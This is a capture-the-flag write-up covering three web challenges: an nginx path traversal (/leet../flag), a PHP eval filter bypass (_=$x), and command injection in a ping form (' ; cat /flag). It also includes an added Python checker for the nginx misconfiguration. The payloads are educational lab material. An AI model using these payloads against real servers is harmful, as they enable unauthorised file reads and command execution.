Our team got 5th
Solved Web challenges
Welcome to Web Universe
Let’s warmup a little bit now with some cool stuffs! Web is really always the best!!
Link: http://20.119.58.135:4567/leetstatus
Author: Kahla
At first I didn’t know where to go or how to approach this. I tried checking for robots.txt, index.php and index.html but couldn’t find anything, until I checked the source code that was provided.
It seems like the website is running behind nginx!
Looking into main.py, we see this:
    from flask import Flask
    import os

    flag=os.getenv("FLAG")
    app = Flask(__name__, static_url_path='/static/')

    @app.route("/v1/status")
    def index():
        return "Everything is good afaik"

    @app.route("/flag")
    def flag():
        return flag

    if __name__ == '__main__':
        app.run()
nginx config file:

    server {
        listen 80;
        server_name welcome.task;
        location /leet {
            proxy_pass http://api:5000/v1/;
        }
        access_log off;
        error_log /var/log/nginx/error.log error;
    }
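From this we can conclude that the "leet" part is like a prefix for the other webpages: a request path starting with /leet is forwarded to the API with /leet replaced by /v1/.
After a bit of googling I figured that we can try to find the path to /flag
===> path traversal !!
This is possible because of the misconfiguration of nginx: location /leet has no trailing slash while proxy_pass ends in /v1/, so /leet../flag is forwarded as /v1/../flag, which resolves to /flag on the backend.
You can read more about this here:
https://www.acunetix.com/vulnerabilities/web/path-traversal-via-misconfigured-nginx-alias/
Finally we find the path to be ../flag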
Path : http://x.x.x.x/leet../flag
and we get our flag :
Securinets{Nginx_Is_NoT_ThaT_GooD_AftER_All}
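An added example, not part of the challenge source or of this write-up: a Python model of how nginx rewrites the path for a prefix location whose proxy_pass carries a URI, with a check that flags the missing trailing slash seen in the config above. The function names and the regex-based parsing are assumptions made for illustration, and the FIXED block (location /leet/) is a constructed variant of the challenge config.

```python
import posixpath
import re

# Constructed inputs: VULNERABLE mirrors the location block from the write-up,
# FIXED is an assumed correction that adds the trailing slash to the location.
VULNERABLE = "location /leet {\n    proxy_pass http://api:5000/v1/;\n}\n"
FIXED = "location /leet/ {\n    proxy_pass http://api:5000/v1/;\n}\n"

# Plain prefix locations only (no =, ~ or ^~ modifiers); a simplification.
BLOCK = re.compile(
    r"location\s+(/\S*)\s*\{[^}]*?proxy_pass\s+https?://[^/\s;]+(/[^\s;]*)?\s*;",
    re.S,
)

def parse(conf):
    """Return (location_prefix, proxy_pass_uri or None) pairs."""
    return [(m.group(1), m.group(2)) for m in BLOCK.finditer(conf)]

def upstream_path(prefix, uri, request_path):
    """Model nginx's rewrite: when proxy_pass carries a URI, the part of the
    request path that matched the location prefix is replaced by that URI."""
    if not request_path.startswith(prefix):
        return None                      # this location does not match
    if uri is None:
        return request_path              # no URI part: path forwarded unchanged
    return uri + request_path[len(prefix):]

def off_by_slash(conf):
    """Locations lacking a trailing slash whose proxy_pass URI ends in one."""
    return [p for p, u in parse(conf)
            if u and u.endswith("/") and not p.endswith("/")]

def escapes(prefix, uri, request_path):
    """True if the forwarded path, with dot segments resolved the way a
    backend would, ends up outside the proxy_pass URI."""
    fwd = upstream_path(prefix, uri, request_path)
    if fwd is None or uri is None:
        return False
    resolved = posixpath.normpath(fwd) + "/"
    return not resolved.startswith(uri.rstrip("/") + "/")

if __name__ == "__main__":
    for name, conf in (("vulnerable", VULNERABLE), ("fixed", FIXED)):
        for prefix, uri in parse(conf):
            print(name, prefix, "off-by-slash:", bool(off_by_slash(conf)),
                  "escapes:", escapes(prefix, uri, "/leet../flag"))
```

With the trailing slash on the location, /leet../flag no longer matches the prefix at all, so nothing is forwarded for it.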
PeeHpee
Dali likes PhP because it’s weird and has a lot of bugs. Is that really true ? Link: http://20.119.58.135:1234
Author: Kahla
We were provided this PHP source code:
    <?php
    //Show Page code source
    highlight_file(__FILE__);
    require "secret.php";
    if(isset($_GET["__"])&&isset($_GET["_"])){
        $x=$_GET["__"];
        $inp=preg_replace("/[^A-Za-z0-9$]/","",$_GET["_"]);
        if($inp==="Kahla"){
            die("Hacking Attempt detected");
        }
        else{
            if(eval("return $inp=".$inp.";")==="Kahla"){
                echo $flag;
            }
            else{
                die("Pretty Close maybe ?");
            }
        }
    }
    ?>
Trying to send “Kahla” in the _ param prints out this prompt:
Payload : http://20.119.58.135:1234/?__=&_=Kahla
Output :
We notice that we have the other __ param too, which we haven’t tried to use yet. It seems sort of useless, but it’s there, so we might as well just use it, right?
So we know that the code is filtering the word Kahla and won’t allow us to get the flag with it.
So how about we use the __ param to send it to the _ param, since it’s not verifying that param?
Payload : http://20.119.58.135:1234/?__=Kahla&_=$_GET[__]
Output :
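Well, I guess we’re pretty close :/ ?
We can’t use $_GET to send the param because the regex won’t allow the [] characters: it strips everything except letters, digits and $.
But notice that we have a $x variable in the source code that takes the __ value!!
All we need to do is pass that through the _ param. The filtered input is then $x, which is not the literal string Kahla, and the eval'd code becomes return $x=$x; which returns the value we put in __.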
Payload : http://20.119.58.135:1234/?__=Kahla&_=$x
Output : Securinets{PeehPee_1s_AlWAYs_H3r3}
And there’s our flag!
Broken Pinggyy
I’ve developed a simple web app to ping any IP/domain but i had some problems in my code .. I’m a newbie web developer so i’ll give the source code to help me. flag location => /flag Link: http://20.119.58.135:789/
Author: MONT4
We were presented with this webpage that allows us to ping other webpages, but the website seems like it’s not working.
I tried to get command injection using just ls or ; ls but nothing works.
Looking through the provided source code we can see that there’s a typo in the ping command: notice the ' before ping.
So now we just need to add a ' before anything we type, and we have to add ; to close out the first command.
So our payload becomes:
' ; ls
But we still don’t get anything! Well, that’s because the flag is at /flag, so we just need to cat that.
Payload becomes:
' ; cat /flag
There’s our flag:
Securinets{Be_c4refuL_fr0m_C0mmand_1njection!!}